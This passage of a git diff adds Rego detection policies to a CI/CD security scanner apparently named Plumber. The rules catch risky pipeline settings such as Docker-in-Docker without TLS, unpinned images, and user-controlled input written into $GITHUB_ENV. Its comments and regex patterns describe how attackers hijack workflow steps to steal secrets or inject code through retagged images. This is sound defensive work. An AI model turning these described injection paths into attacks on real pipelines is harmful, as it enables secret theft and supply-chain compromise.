+# / days to flag a bad release; a cooldown buys exactly that window.
+package dependabot_missing_cooldown
+
+import rego.v1
+
+deny contains finding if {
+	input.pipeline.dependabot
+	some i
+	ecosystem := input.pipeline.dependabot.missingCooldownEcosystems[i]
+	finding := {
+		"code": "ISSUE-607",
+		"severity": "low",
+		"message": sprintf("dependabot ecosystem %q has no cooldown window — a compromised upstream release would reach an auto-merge PR immediately", [ecosystem]),
+		"file": input.pipeline.dependabot.path,
+	}
+}
diff --git a/policies/dependency_update_tool_missing.rego b/policies/dependency_update_tool_missing.rego
new file mode 100644
index 0000000..6ae13a0
--- /dev/null
+++ b/policies/dependency_update_tool_missing.rego
@@ -0,0 +1,27 @@
+# dependency-update-tool-missing β flag repositories with workflows
+# but without any dependency-update tool configured. A project that
+# pins its dependencies (which every sane workflow does via
+# `actions/checkout@` etc.) then has no automation to refresh
+# those pins as upstream ships patches, and every unpatched CVE
+# stays in place until a human remembers to look.
+#
+# Satisfied by either `.github/dependabot.yml` (any shape) or a
+# Renovate config at a conventional path. The collector populates
+# `Dependabot` and `RenovateConfigPath` accordingly.
+package dependency_update_tool_missing
+
+import rego.v1
+
+deny contains finding if {
+	input.pipeline.provider == "github"
+	count(input.pipeline.jobs) > 0
+	not input.pipeline.dependabot
+	not input.pipeline.renovateConfigPath
+	first_file := input.pipeline.jobs[0].originFile
+	finding := {
+		"code": "ISSUE-608",
+		"severity": "medium",
+		"message": "repository has workflows but neither dependabot.yml nor renovate.json is configured — dependency pins will drift and stale CVEs will persist",
+		"file": first_file,
+	}
+}
diff --git a/policies/docker_in_docker.rego b/policies/docker_in_docker.rego
new file mode 100644
index 0000000..682c574
--- /dev/null
+++ b/policies/docker_in_docker.rego
@@ -0,0 +1,60 @@
+# docker-in-docker β flag CI/CD jobs that attach a Docker-in-Docker
+# (dind) service. Running a Docker daemon inside a CI container on
+# shared runners in privileged mode enables container escape and
+# cross-job secret exfiltration. The upstream GitLab documentation
+# now recommends Kaniko or Buildah for container builds instead.
+#
+# Parity with the legacy Go control (controlGitlabPipelineDockerInDocker.go):
+# - The image must be the `docker` image (registry-prefixed names
+# such as `registry.gitlab.com/group/docker:dind` are accepted β
+# only the trailing path segment matters).
+# - The tag must be `dind`, `latest`, or contain `dind`. Bare
+# `docker` (no tag) is intentionally NOT considered dind.
+# - At most one finding per job, mirroring the legacy `break` after
+# the first matched service.
+package docker_in_docker
+
+import rego.v1
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ dind := _first_dind_service(job)
+ finding := {
+ "code": "ISSUE-412",
+ "severity": "high",
+ "message": sprintf("job %q uses Docker-in-Docker service %q", [job.name, _image_ref(dind)]),
+ "job": job.name,
+ "serviceImage": _image_ref(dind),
+ }
+}
+
+# _first_dind_service preserves the legacy "first match wins" behaviour
+# so a job with multiple services never produces more than one
+# ISSUE-412 finding.
+_first_dind_service(job) := svc if {
+ matching := [s | some k; s := job.services[k]; _is_dind(s)]
+ count(matching) > 0
+ svc := matching[0]
+}
+
+_is_dind(img) if {
+ _is_docker_name(img.name)
+ img.tag != ""
+ _is_dind_tag(img.tag)
+}
+
+_is_docker_name(name) if lower(name) == "docker"
+
+_is_docker_name(name) if endswith(lower(name), "/docker")
+
+_is_dind_tag(tag) if lower(tag) == "dind"
+
+_is_dind_tag(tag) if lower(tag) == "latest"
+
+_is_dind_tag(tag) if contains(lower(tag), "dind")
+
+_image_ref(img) := ref if {
+ img.tag != ""
+ ref := sprintf("%s:%s", [img.name, img.tag])
+} else := img.name
diff --git a/policies/docker_in_docker_insecure.rego b/policies/docker_in_docker_insecure.rego
new file mode 100644
index 0000000..39de63a
--- /dev/null
+++ b/policies/docker_in_docker_insecure.rego
@@ -0,0 +1,89 @@
+# docker-in-docker-insecure β flag Docker-in-Docker jobs whose daemon
+# configuration is exposed without TLS. Two well-documented unsafe
+# patterns:
+#
+# - DOCKER_TLS_CERTDIR set to the empty string (disables TLS between
+# the Docker client and the daemon).
+# - DOCKER_HOST containing `:2375` (plain TCP daemon endpoint).
+#
+# The policy only fires when a dind service is already present on the
+# job β a daemon that is not shipped with the pipeline cannot leak
+# through these variables. Both job-level and pipeline-level globals
+# are inspected (matching the legacy detectInsecureDaemon helper).
+package docker_in_docker_insecure
+
+import rego.v1
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ dind := _first_dind_service(job)
+ _insecure_for_job(job)
+ detail := _insecure_detail(job)
+ finding := {
+ "code": "ISSUE-413",
+ "severity": "critical",
+ "message": sprintf("Job '%s': %s", [job.name, detail]),
+ "job": job.name,
+ "detail": detail,
+ }
+}
+
+_first_dind_service(job) := svc if {
+ matching := [s | some k; s := job.services[k]; _is_dind(s)]
+ count(matching) > 0
+ svc := matching[0]
+}
+
+_is_dind(img) if {
+ _is_docker_name(img.name)
+ img.tag != ""
+ _is_dind_tag(img.tag)
+}
+
+_is_docker_name(name) if lower(name) == "docker"
+
+_is_docker_name(name) if endswith(lower(name), "/docker")
+
+_is_dind_tag(tag) if lower(tag) == "dind"
+
+_is_dind_tag(tag) if lower(tag) == "latest"
+
+_is_dind_tag(tag) if contains(lower(tag), "dind")
+
+_insecure_for_job(job) if _vars_insecure(job.variables)
+
+_insecure_for_job(job) if _vars_insecure(input.pipeline.globalVariables)
+
+_vars_insecure(vars) if {
+ some k, v in vars
+ upper(k) == "DOCKER_TLS_CERTDIR"
+ trim_space(v) == ""
+}
+
+_vars_insecure(vars) if {
+ some k, v in vars
+ upper(k) == "DOCKER_HOST"
+ contains(v, ":2375")
+}
+
+_insecure_detail(job) := detail if {
+ detail := _detail_for_vars(job.variables)
+} else := detail if {
+ detail := _detail_for_vars(input.pipeline.globalVariables)
+} else := "insecure daemon configuration detected"
+
+_detail_for_vars(vars) := "DOCKER_TLS_CERTDIR set to empty string disables TLS" if {
+ some k, v in vars
+ upper(k) == "DOCKER_TLS_CERTDIR"
+ trim_space(v) == ""
+} else := sprintf("DOCKER_HOST=%q exposes the daemon over plain TCP (port 2375)", [v]) if {
+ some k, v in vars
+ upper(k) == "DOCKER_HOST"
+ contains(v, ":2375")
+}
+
+_image_ref(img) := ref if {
+ img.tag != ""
+ ref := sprintf("%s:%s", [img.name, img.tag])
+} else := img.name
diff --git a/policies/dockerfile_unpinned_base.rego b/policies/dockerfile_unpinned_base.rego
new file mode 100644
index 0000000..a5dcad1
--- /dev/null
+++ b/policies/dockerfile_unpinned_base.rego
@@ -0,0 +1,46 @@
+# dockerfile-unpinned-base β flag Dockerfile FROM directives that
+# reference a base image without a `@sha256:β¦` digest. Tags are
+# mutable at the registry level: an attacker who compromises the
+# registry β or the image maintainer β can re-push the same tag to
+# point at a different layer, silently injecting code into every
+# later build that pulls the reference. Pinning by digest is the
+# single control that neutralises this vector.
+#
+# The collector scans Dockerfile-shaped files at the repo root and
+# under common build directories (up to two levels deep), parsing
+# each FROM line and recording whether the reference carries a
+# digest. Policy emits one finding per unpinned FROM.
+package dockerfile_unpinned_base
+
+import rego.v1
+
+deny contains finding if {
+ some i, j
+ df := input.pipeline.dockerfiles[i]
+ base := df.bases[j]
+ not base.pinnedByDigest
+ not _is_scratch(base.image)
+ not _is_stage_ref(base.image)
+ finding := {
+ "code": "ISSUE-107",
+ "severity": "medium",
+ "message": sprintf("Dockerfile references base image %q without a @sha256 digest β pin by digest to neutralise registry-side retagging", [base.image]),
+ "file": df.path,
+ "line": base.line,
+ }
+}
+
+# `FROM scratch` has no registry layer β nothing to pin.
+_is_scratch(image) if {
+ image == "scratch"
+}
+
+# `FROM builder` (alias from a previous build stage) is not an
+# external reference; the stage was defined earlier in the same
+# Dockerfile. Heuristic: no `/`, `:` or `@` means a single-token
+# alias. NOTE(review): this also exempts untagged official images (`FROM ubuntu`) — confirm the collector can distinguish real stage aliases.
+_is_stage_ref(image) if {
+ not contains(image, "/")
+ not contains(image, ":")
+ not contains(image, "@")
+}
diff --git a/policies/embed.go b/policies/embed.go
new file mode 100644
index 0000000..8461a4a
--- /dev/null
+++ b/policies/embed.go
@@ -0,0 +1,13 @@
+// Package policies exposes the built-in Rego policies shipped with Plumber.
+// The directory contents are embedded at build time via //go:embed. Users
+// can extend or override them at runtime via --policies (Phase 2+).
+package policies
+
+import "embed"
+
+// FS holds every .rego file at the root of the policies/ directory.
+// Nested subdirectories will be picked up once the concern-based layout
+// (policies/image/, policies/pipeline/, ...) is introduced in Phase 2.
+//
+//go:embed *.rego
+var FS embed.FS
diff --git a/policies/excessive_permissions.rego b/policies/excessive_permissions.rego
new file mode 100644
index 0000000..b510ebe
--- /dev/null
+++ b/policies/excessive_permissions.rego
@@ -0,0 +1,23 @@
+# excessive-permissions β flag pipeline jobs whose effective permissions
+# block grants blanket write access. For GitHub Actions this is
+# `permissions: write-all` set either at workflow level (propagated to
+# every job by the collector) or at the job level.
+#
+# Stricter forms (e.g. { contents: read, packages: write }) are out of
+# scope for now β a later iteration may accept a per-rule allow-list of
+# permitted scopes. This policy has no runtime configuration yet.
+package excessive_permissions
+
+import rego.v1
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ job.permissions == "write-all"
+ finding := {
+ "code": "ISSUE-509",
+ "severity": "high",
+ "message": sprintf("job %q runs with overly broad permissions: \"write-all\"", [job.name]),
+ "job": job.name,
+ }
+}
diff --git a/policies/github_app_skip_revoke.rego b/policies/github_app_skip_revoke.rego
new file mode 100644
index 0000000..2a22f28
--- /dev/null
+++ b/policies/github_app_skip_revoke.rego
@@ -0,0 +1,55 @@
+# github-app-skip-revoke β flag workflows that mint a GitHub App
+# installation token and disable revocation on exit. The canonical
+# action (`actions/create-github-app-token`) exposes a
+# `skip-token-revoke:` input that defaults to `false`; setting it to
+# `true` keeps the minted token alive long after the workflow
+# terminates. A later leak (log fragment, artefact, cache) then
+# hands the attacker a still-working token with the App's full
+# permission set.
+#
+# The policy matches the `with.skip-token-revoke` input on any step
+# whose `uses:` starts with the canonical app-token actions. Other
+# community actions that follow the same input naming pick up the
+# check for free.
+package github_app_skip_revoke
+
+import rego.v1
+
+token_actions := {
+ "actions/create-github-app-token",
+ "tibdex/github-app-token",
+ "getsentry/action-github-app-token",
+ "peter-murray/workflow-application-token-action",
+}
+
+deny contains finding if {
+	some i, j
+	job := input.pipeline.jobs[i]
+	action := job.uses[j]
+	_is_app_token_action(action.uses)
+	_revocation_disabled(action)
+	finding := {
+		"code": "ISSUE-306",
+		"severity": "high",
+		"message": sprintf("job %q mints a GitHub App token via %q with `skip-token-revoke: true` — the token survives the run and any later leak stays exploitable", [job.name, action.uses]),
+		"job": job.name,
+	}
+}
+
+_is_app_token_action(uses) if {
+ some prefix in token_actions
+ startswith(uses, sprintf("%s@", [prefix]))
+}
+
+_is_app_token_action(uses) if {
+ some prefix in token_actions
+ uses == prefix
+}
+
+_revocation_disabled(action) if {
+ action.with["skip-token-revoke"] == true
+}
+
+_revocation_disabled(action) if {
+ action.with["skip-token-revoke"] == "true"
+}
diff --git a/policies/github_env_injection.rego b/policies/github_env_injection.rego
new file mode 100644
index 0000000..d5d01fb
--- /dev/null
+++ b/policies/github_env_injection.rego
@@ -0,0 +1,64 @@
+# github-env-injection β flag `run:` steps that append user-controlled
+# content to $GITHUB_ENV or $GITHUB_PATH. These two files are sticky:
+# every subsequent step of the job reads the variables/PATH entries
+# they define. An attacker who can influence the appended value
+# (PR title, issue body, fork branch name, ...) can override
+# `NODE_OPTIONS`, front-load a malicious directory on PATH, and hijack
+# later tool invocations β exfiltrating secrets when the workflow runs
+# under a secret-bearing trigger (pull_request_target, workflow_run).
+#
+# The check fires when a script line writes to $GITHUB_ENV or
+# $GITHUB_PATH AND the line contains a GitHub template expression
+# known to carry user input (github.event.*, github.head_ref,
+# github.pull_request.*). The env: binding pattern stays quiet β
+# `echo "VAR=$SAFE_BIND" >> $GITHUB_ENV` with SAFE_BIND coming from
+# an `env:` block is not matched because the expression is not on the
+# same line as the redirect.
+package github_env_injection
+
+import rego.v1
+
+# Expressions GitHub considers attacker-influenceable under fork-based
+# triggers. Same list as the template-injection policy (ISSUE-206);
+# any value under `github.event.*` or `github.head_ref` can be
+# replaced by a PR author.
+unsafe_patterns := [
+ `\${{\s*github\.event\.`,
+ `\${{\s*github\.head_ref\s*}}`,
+ `\${{\s*github\.pull_request\.`,
+]
+
+# sink_patterns are regex patterns matching a shell redirect that
+# writes into one of the two special GitHub files. Covers both the
+# `$GITHUB_ENV` and `${GITHUB_ENV}` forms, plus the rarer `tee`-style
+# variant.
+sink_patterns := [
+ `>>\s*\$\{?GITHUB_ENV\}?`,
+ `>\s*\$\{?GITHUB_ENV\}?`,
+ `>>\s*\$\{?GITHUB_PATH\}?`,
+ `>\s*\$\{?GITHUB_PATH\}?`,
+ `\btee\s+-a\s+\$\{?GITHUB_ENV\}?`,
+ `\btee\s+-a\s+\$\{?GITHUB_PATH\}?`,
+]
+
+deny contains finding if {
+	some i, j
+	job := input.pipeline.jobs[i]
+	script := job.scripts[j]
+	_writes_to_github_file(script)
+	_has_unsafe_expression(script)
+	finding := {
+		"code": "ISSUE-209",
+		"severity": "critical",
+		"message": sprintf("job %q writes a user-controlled template expression into $GITHUB_ENV or $GITHUB_PATH — an attacker can hijack later steps", [job.name]),
+		"job": job.name,
+	}
+}
+
+_writes_to_github_file(line) if {
+ regex.match(sink_patterns[_], line)
+}
+
+_has_unsafe_expression(line) if {
+ regex.match(unsafe_patterns[_], line)
+}
diff --git a/policies/hardcoded_jobs.rego b/policies/hardcoded_jobs.rego
new file mode 100644
index 0000000..5c03c19
--- /dev/null
+++ b/policies/hardcoded_jobs.rego
@@ -0,0 +1,20 @@
+# hardcoded-jobs β flag pipeline jobs defined directly in the project
+# .gitlab-ci.yml instead of sourced from a reviewed include, template
+# or component. Hardcoded jobs escape the approval/versioning flow
+# that governs shared CI assets, making them a common blind spot for
+# supply-chain governance.
+package hardcoded_jobs
+
+import rego.v1
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ job.originKind == "hardcoded"
+ finding := {
+ "code": "ISSUE-401",
+ "severity": "medium",
+ "message": sprintf("job %q is hardcoded (not sourced from include/component/template)", [job.name]),
+ "job": job.name,
+ }
+}
diff --git a/policies/image_authorized_sources.rego b/policies/image_authorized_sources.rego
new file mode 100644
index 0000000..a74d3fd
--- /dev/null
+++ b/policies/image_authorized_sources.rego
@@ -0,0 +1,89 @@
+# image-authorized-sources β flag pipeline jobs that pull a container
+# image from a registry not listed in
+# containerImageMustComeFromAuthorizedSources.trustedUrls. Official
+# Docker Hub images (image name without a slash) are accepted
+# implicitly when trustDockerHubOfficialImages is true.
+#
+# Parity with the legacy Go control (controlGitlabImageUntrusted.go):
+# - The "unknown" registry literal emitted by the GitLab image
+# collector is treated the same as no registry (image name only).
+# - Both the image reference and each trustedUrls pattern are
+# normalised so `${VAR}` and `$VAR` compare equal β mirrors the
+# legacy normalizeVarNotation pass.
+# - Glob matching is performed via `glob.match(pat, null, ref)` which
+# mirrors go-wildcard.Match semantics for `*` and `?` patterns.
+package image_authorized_sources
+
+import rego.v1
+
+deny contains finding if {
+ # Only run when the user has declared an authorized-sources policy;
+ # without a config, the rule is effectively disabled.
+ input.config.imageAuthorizedSources
+ some i
+ job := input.pipeline.jobs[i]
+ job.image
+ not _is_authorized(job.image)
+ finding := {
+ "code": "ISSUE-101",
+ "severity": "critical",
+ "message": sprintf("job %q uses image from untrusted source: %s", [job.name, _full_ref(job.image)]),
+ "job": job.name,
+ "link": _full_ref(job.image),
+ "status": "unauthorized",
+ }
+}
+
+_is_authorized(img) if {
+ pattern := input.config.imageAuthorizedSources.trustedUrls[_]
+ glob.match(_normalize_var(pattern), null, _normalize_var(_full_ref(img)))
+}
+
+_is_authorized(img) if {
+ input.config.imageAuthorizedSources.trustDockerHubOfficial == true
+ _is_docker_hub_official(img)
+}
+
+# Legacy treats only single-segment names (no slash) as Docker Hub
+# official. The collector strips the canonical `library/` prefix
+# upstream, so we match that contract literally β a name containing a
+# slash is never treated as official.
+_is_docker_hub_official(img) if {
+ _registry_is_docker_hub(img)
+ not contains(img.name, "/")
+}
+
+_registry_is_docker_hub(img) if img.registry == "docker.io"
+
+_registry_is_docker_hub(img) if not img.registry
+
+_registry_is_docker_hub(img) if img.registry == ""
+
+# _normalize_var rewrites `${VAR}` references to `$VAR` so user
+# patterns and rendered image refs compare equal regardless of which
+# notation a pipeline author used. Mirrors the normalizeVarNotation
+# helper in controlGitlabImageUntrusted.go.
+_normalize_var(s) := regex.replace(s, `\$\{([a-zA-Z_][a-zA-Z0-9_]*)\}`, `$$$1`)
+
+# _full_ref builds the canonical `<registry>/<name>:<tag>` string the
+# trusted-URL globs in .plumber.yaml are written against. Including
+# the tag is essential — patterns like `docker.io/foo/bar:*`
+# explicitly carry a colon and the glob would otherwise miss the
+# untagged form. The "unknown" registry literal is collapsed to no
+# registry (legacy behaviour: imageUrl = image.Name only).
+_full_ref(img) := ref if {
+ _has_known_registry(img)
+ img.tag != ""
+ ref := sprintf("%s/%s:%s", [img.registry, img.name, img.tag])
+} else := ref if {
+ _has_known_registry(img)
+ ref := sprintf("%s/%s", [img.registry, img.name])
+} else := ref if {
+ img.tag != ""
+ ref := sprintf("%s:%s", [img.name, img.tag])
+} else := img.name
+
+_has_known_registry(img) if {
+ img.registry != ""
+ img.registry != "unknown"
+}
diff --git a/policies/image_mutable_tag.rego b/policies/image_mutable_tag.rego
new file mode 100644
index 0000000..cf1266e
--- /dev/null
+++ b/policies/image_mutable_tag.rego
@@ -0,0 +1,38 @@
+# image_mutable_tag β flag pipeline jobs whose container image uses a tag
+# listed in the user's .plumber.yaml forbidden-tag set.
+#
+# Config contract:
+# input.config.imageMutableTag.forbiddenTags = ["latest", "dev", "v*-alpha", ...]
+#
+# Patterns support glob wildcards (`*`, `?`) for parity with the legacy Go
+# control containerImageMustNotUseForbiddenTags. Issue code ISSUE-102 is
+# kept identical to the Go output so findings stay comparable in shadow mode.
+package image_mutable_tag
+
+import rego.v1
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ tag := job.image.tag
+ tag != ""
+ _tag_is_forbidden(tag)
+ finding := {
+ "code": "ISSUE-102",
+ "severity": "high",
+ "message": sprintf("Job '%s' uses forbidden tag '%s' (image: %s)", [job.name, tag, _full_ref(job.image)]),
+ "job": job.name,
+ "tag": tag,
+ "link": _full_ref(job.image),
+ }
+}
+
+_full_ref(img) := ref if {
+	not img.registry in {"", "unknown"} # collapse the collector's "unknown" sentinel, for parity with image_authorized_sources
+	ref := sprintf("%s/%s:%s", [img.registry, img.name, img.tag])
+} else := sprintf("%s:%s", [img.name, img.tag])
+
+_tag_is_forbidden(tag) if {
+ pattern := input.config.imageMutableTag.forbiddenTags[_]
+ glob.match(pattern, null, tag)
+}
diff --git a/policies/image_pinned_by_digest.rego b/policies/image_pinned_by_digest.rego
new file mode 100644
index 0000000..e5c0fc3
--- /dev/null
+++ b/policies/image_pinned_by_digest.rego
@@ -0,0 +1,55 @@
+# image-pinned-by-digest β flag pipeline jobs whose container image is
+# referenced by tag rather than by immutable content digest (`@sha256:β¦`).
+# Only fires when the policy is opted into via
+# `containerImageMustNotUseForbiddenTags.mustBePinnedByDigest: true` in
+# the .plumber.yaml, matching the legacy Go control semantics. Tag-based
+# references (even pinned to a specific version like `python:3.12.1`)
+# are flagged because the tag can be moved to a different image at any
+# point in time.
+package image_pinned_by_digest
+
+import rego.v1
+
+deny contains finding if {
+ _pin_by_digest_required
+ some i
+ job := input.pipeline.jobs[i]
+ job.image
+ not _image_has_digest(job.image)
+ finding := {
+ "code": "ISSUE-103",
+ "severity": "high",
+ "message": sprintf("job %q uses image without digest pinning: %s", [job.name, _image_ref(job.image)]),
+ "job": job.name,
+ "link": _image_ref(job.image),
+ "tag": _image_tag(job.image),
+ }
+}
+
+_image_tag(img) := img.tag if {
+ img.tag != ""
+} else := ""
+
+_pin_by_digest_required if {
+ input.config.containerImageMustNotUseForbiddenTags.mustBePinnedByDigest == true
+}
+
+_image_has_digest(img) if {
+ img.digest != null
+ img.digest != ""
+}
+
+# Build the full `<registry>/<name>:<tag>` ref the legacy "link"
+# field surfaces. Falls back to bare name (and optionally :tag) when
+# the registry is empty.
+_image_ref(img) := ref if {
+ img.registry != ""
+ img.tag != ""
+ ref := sprintf("%s/%s:%s", [img.registry, img.name, img.tag])
+} else := ref if {
+ img.registry != ""
+ ref := sprintf("%s/%s", [img.registry, img.name])
+} else := ref if {
+ img.tag != ""
+ ref := sprintf("%s:%s", [img.name, img.tag])
+} else := img.name
diff --git a/policies/impostor_commit.rego b/policies/impostor_commit.rego
new file mode 100644
index 0000000..6631df0
--- /dev/null
+++ b/policies/impostor_commit.rego
@@ -0,0 +1,39 @@
+# impostor-commit β flag workflow steps pinned to a 40-character
+# SHA that does not resolve in the action's upstream repository.
+# Either a typo (the runner silently falls back to the default
+# branch) or the literal `impostor commit` attack vector: a commit
+# that looks legitimate in a PR comment / stargazer URL but was
+# never merged upstream.
+#
+# Requires the collector to have resolved the action's GitHub
+# metadata. When metadata is missing we stay silent β verifying a
+# SHA against the upstream repo needs an API call and we refuse to
+# guess.
+package impostor_commit
+
+import rego.v1
+
+sha_pattern := `^[0-9a-f]{40}$`
+
+deny contains finding if {
+	some i, j
+	job := input.pipeline.jobs[i]
+	action := job.uses[j]
+	ref := _ref_of(action.uses)
+	regex.match(sha_pattern, ref)
+	action.metadata
+	action.metadata.refExists == false
+	finding := {
+		"code": "ISSUE-109",
+		"severity": "critical",
+		"message": sprintf("job %q pins action %q to a commit SHA that does not exist in the upstream repository — typo or impostor-commit attack", [job.name, action.uses]),
+		"job": job.name,
+		"line": object.get(action, "line", 0),
+	}
+}
+
+_ref_of(uses) := ref if {
+ idx := indexof(uses, "@")
+ idx >= 0
+ ref := substring(uses, idx + 1, -1)
+}
diff --git a/policies/includes_forbidden_version.rego b/policies/includes_forbidden_version.rego
new file mode 100644
index 0000000..b0fcdde
--- /dev/null
+++ b/policies/includes_forbidden_version.rego
@@ -0,0 +1,40 @@
+# includes-forbidden-version β flag pipeline includes whose pinned
+# version appears in the .plumber.yaml's forbiddenVersions list (for
+# example branch names like "main" or "master", which are
+# rolling-release pointers rather than immutable refs).
+#
+# Parity with the legacy Go control:
+# - Hardcoded jobs are skipped (origins without a pinnable version).
+# - Patterns support wildcard semantics via glob.match (matches the
+# legacy go-wildcard.Match behaviour: `*` and `?`).
+# - When defaultBranchIsForbiddenVersion is true, the project's
+# default branch (carried on the IR pipeline) joins the
+# forbidden list.
+package includes_forbidden_version
+
+import rego.v1
+
+deny contains finding if {
+ some i
+ inc := input.pipeline.includes[i]
+ inc.kind != "hardcoded"
+ inc.ref != ""
+ _version_is_forbidden(inc.ref)
+ finding := {
+ "code": "ISSUE-404",
+ "severity": "medium",
+ "message": sprintf("%s uses forbidden version '%s'", [inc.source, inc.ref]),
+ "job": inc.source,
+ }
+}
+
+_version_is_forbidden(ref) if {
+ pattern := input.config.includesForbiddenVersions.forbiddenVersions[_]
+ glob.match(pattern, null, ref)
+}
+
+_version_is_forbidden(ref) if {
+ input.config.includesForbiddenVersions.defaultBranchIsForbiddenVersion == true
+ input.pipeline.defaultBranch != ""
+ ref == input.pipeline.defaultBranch
+}
diff --git a/policies/includes_outdated.rego b/policies/includes_outdated.rego
new file mode 100644
index 0000000..2d22645
--- /dev/null
+++ b/policies/includes_outdated.rego
@@ -0,0 +1,52 @@
+# includes-outdated β flag pipeline includes that are pinned to a
+# version older than the latest one advertised upstream (Plumber
+# template registry or GitLab component catalogue). The collector
+# resolves the latest version ahead of time and exposes it on the
+# include as `current`; when `ref != current` (and both are
+# populated) the include is out of date.
+package includes_outdated
+
+import rego.v1
+
+deny contains finding if {
+ some i
+ inc := input.pipeline.includes[i]
+ inc.ref != ""
+ inc.current != ""
+ inc.ref != inc.current
+ not _ref_is_forbidden_version(inc.ref)
+ _is_semver_like(inc.ref)
+ finding := {
+ "code": "ISSUE-403",
+ "severity": "medium",
+ "message": sprintf("%s uses version '%s' (latest: %s)", [inc.source, inc.ref, inc.current]),
+ "job": inc.source,
+ "version": inc.ref,
+ "latestVersion": inc.current,
+ "gitlabIncludeLocation": inc.source,
+ "gitlabIncludeType": inc.kind,
+ "nested": object.get(inc, "nested", false),
+ "componentName": object.get(inc, "componentName", ""),
+ "originHash": object.get(inc, "originHash", 0),
+ }
+}
+
+# A ref pinned to a configured forbidden version (e.g. `main`,
+# `master`, `HEAD`) is already flagged by ISSUE-404. Comparing it to
+# the latest semver release is a category error β the user is asking
+# for a mutable ref by design, so "outdated" is meaningless. Mirrors
+# the legacy IsUpToDate behaviour where mutable refs were treated as
+# up-to-date.
+_ref_is_forbidden_version(ref) if {
+ some forbidden in input.config.includesForbiddenVersions.forbiddenVersions
+ glob.match(forbidden, null, ref)
+}
+
+# Outdated comparison only makes sense for refs that look like a
+# version number. Mutable branch/tag pointers (`main`, `master`,
+# `HEAD`, `develop`, ...) have no meaningful "latest" β they ARE the
+# tip of a branch β so we skip them regardless of user config. A
+# semver-like ref optionally starts with `v`, then a numeric major
+# component, optional minor/patch parts, and an optional pre-release
+# or build suffix.
+_is_semver_like(ref) if regex.match(`^v?\d+(\.\d+)*([-+].*)?$`, ref)
diff --git a/policies/insecure_commands.rego b/policies/insecure_commands.rego
new file mode 100644
index 0000000..84115c2
--- /dev/null
+++ b/policies/insecure_commands.rego
@@ -0,0 +1,26 @@
+# insecure-commands β detect workflows that re-enable the deprecated
+# GitHub Actions workflow commands (`::set-env::`, `::add-path::`).
+# These commands were disabled by GitHub after CVE-2020-15228 because
+# they let attacker-controlled log output rewrite the running job's
+# environment and PATH from inside a step. Turning them back on via
+# `ACTIONS_ALLOW_UNSECURE_COMMANDS: true` re-introduces the exact
+# injection sink a mitigation was deployed to close.
+package insecure_commands
+
+import rego.v1
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ _insecure_commands_enabled(job.variables)
+ finding := {
+ "code": "ISSUE-208",
+ "severity": "high",
+ "message": sprintf("job %q re-enables deprecated workflow commands via ACTIONS_ALLOW_UNSECURE_COMMANDS (CVE-2020-15228)", [job.name]),
+ "job": job.name,
+ }
+}
+
+_insecure_commands_enabled(vars) if {
+	lower(trim_space(sprintf("%v", [vars["ACTIONS_ALLOW_UNSECURE_COMMANDS"]]))) == "true" # runner parses with bool.TryParse (case-insensitive, whitespace-tolerant); %v also folds a bare YAML boolean
+}
diff --git a/policies/job_variable_override.rego b/policies/job_variable_override.rego
new file mode 100644
index 0000000..5a99880
--- /dev/null
+++ b/policies/job_variable_override.rego
@@ -0,0 +1,54 @@
+# job-variable-override β flag jobs that define (and therefore
+# override) a variable that should only live in the platform settings
+# (GitLab CI/CD Settings > Variables, GitHub repository secrets, β¦).
+# The authoritative list ships in .plumber.yaml under
+# pipelineMustNotOverrideJobVariables.variables.
+#
+# The policy reads job.localVariables β the `variables:` block the
+# project author wrote directly in .gitlab-ci.yml β never the merged
+# Variables map. This way variables shipped by an upstream component
+# or template stay out of scope (only the user's deliberate override
+# matters), while a user-authored override on a job inherited from a
+# component (e.g. `secret_detection: { variables: { SAST_DISABLED:
+# true } }`) still fires. Mirrors the legacy raw-conf scan in
+# controlGitlabPipelineJobVariablesOverride.go.
+package job_variable_override
+
+import rego.v1
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ some var_name in _protected_variables
+ job.localVariables[var_name]
+ finding := {
+ "code": "ISSUE-205",
+ "severity": "critical",
+ "message": sprintf("%s = %q (job %q)", [var_name, job.localVariables[var_name], job.name]),
+ "job": job.name,
+ "variableName": var_name,
+ "value": job.localVariables[var_name],
+ "location": job.name,
+ }
+}
+
+# Pipeline-level globals override the platform-only contract just as
+# job-level definitions do. Emit once per protected variable defined
+# at the global block.
+deny contains finding if {
+ some var_name in _protected_variables
+ input.pipeline.globalVariables[var_name]
+ finding := {
+ "code": "ISSUE-205",
+ "severity": "critical",
+ "message": sprintf("%s = %q (global variables)", [var_name, input.pipeline.globalVariables[var_name]]),
+ "variableName": var_name,
+ "value": input.pipeline.globalVariables[var_name],
+ "location": "global",
+ }
+}
+
+_protected_variables := vars if {
+ vars := input.config.jobVariablesOverride.protectedVariables
+ count(vars) > 0
+} else := []
diff --git a/policies/known_vulnerable_action.rego b/policies/known_vulnerable_action.rego
new file mode 100644
index 0000000..0d65ac7
--- /dev/null
+++ b/policies/known_vulnerable_action.rego
@@ -0,0 +1,53 @@
+# known-vulnerable-action β flag action references that carry a
+# published GitHub Advisory Database entry. The collector queries
+# `/advisories?ecosystem=actions&affects=<owner>/<repo>` once per
+# repo and caches the result, so finding the N callers of a single
+# compromised action costs one API call.
+#
+# The policy emits one finding per (job, action) pair whose
+# Advisories slice is non-empty. The message quotes each GHSA
+# identifier alongside its advisory URL on the GitHub Advisory
+# Database β the terminal renderer turns the URL into a clickable
+# link. Severity is critical: a workflow running a known-
+# vulnerable action version inherits the published vulnerability
+# class with the full blast radius of the job's permissions and
+# secrets.
+#
+# Caveat: Plumber does not today evaluate the advisory's
+# `vulnerable_version_range` semver expression against the pinned
+# ref, so a positive hit means "at least one advisory exists for
+# this action". Policies that want to whitelist patched versions
+# can use `--skip-controls actionsMustNotCarryKnownCVEs` on a
+# per-job basis once the upgrade is live.
+package known_vulnerable_action
+
+import rego.v1
+
+deny contains finding if {
+	some i, j
+	job := input.pipeline.jobs[i]
+	action := job.uses[j]
+	# Degraded mode (collector ran without API access) leaves metadata
+	# undefined; the expression then fails and the rule stays silent
+	# instead of erroring.
+	action.metadata
+	count(action.metadata.advisories) > 0
+	finding := {
+		"code": "ISSUE-114",
+		"severity": "critical",
